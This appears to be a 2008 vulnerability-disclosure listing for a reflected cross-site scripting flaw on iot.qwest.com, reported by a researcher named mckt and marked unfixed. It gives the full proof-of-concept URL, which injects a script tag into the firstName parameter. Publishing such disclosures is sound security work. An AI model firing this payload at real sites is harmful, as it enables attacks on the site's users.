Security researcher mckt, has submitted on 07/08/2008 a cross-site-scripting (XSS) vulnerability affecting iot.qwest.com, which at the time of submission ranked 10497 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/08/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 07/08/2008 |
Date published: 15/08/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: mckt |
Domain: iot.qwest.com |
Category: XSS |
Pagerank: 10497 |
URL: https://iot.qwest.com/iot/new/GetNewNameAddressForm.do?action=valAddr&streetAddress=&billAddr1=11+St reet&stTypeIdx=&billStTypeIdx=&firstName=%22%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E&houseNumber=&s treetDirection=--&streetName=&streetType=--&streetSuffix=--&unitType=--&unitValue=&city=&state=--&zi pCode=&otherWorkingService=No&otherQwestService=No&previousQwestService=No&billFromService=Yes&paper lessBilling=Yes&billAddrDis=&billHouseNumber=&billStreetDirection=--&billStreetName=&billStreetType= --&billStreetSuffix=--&billUnitType=--&billUnitValue=&billCity=City&billState=--&billZip=11111&next. x=23&next.y=17 |
Click here to view the mirror
|
|
|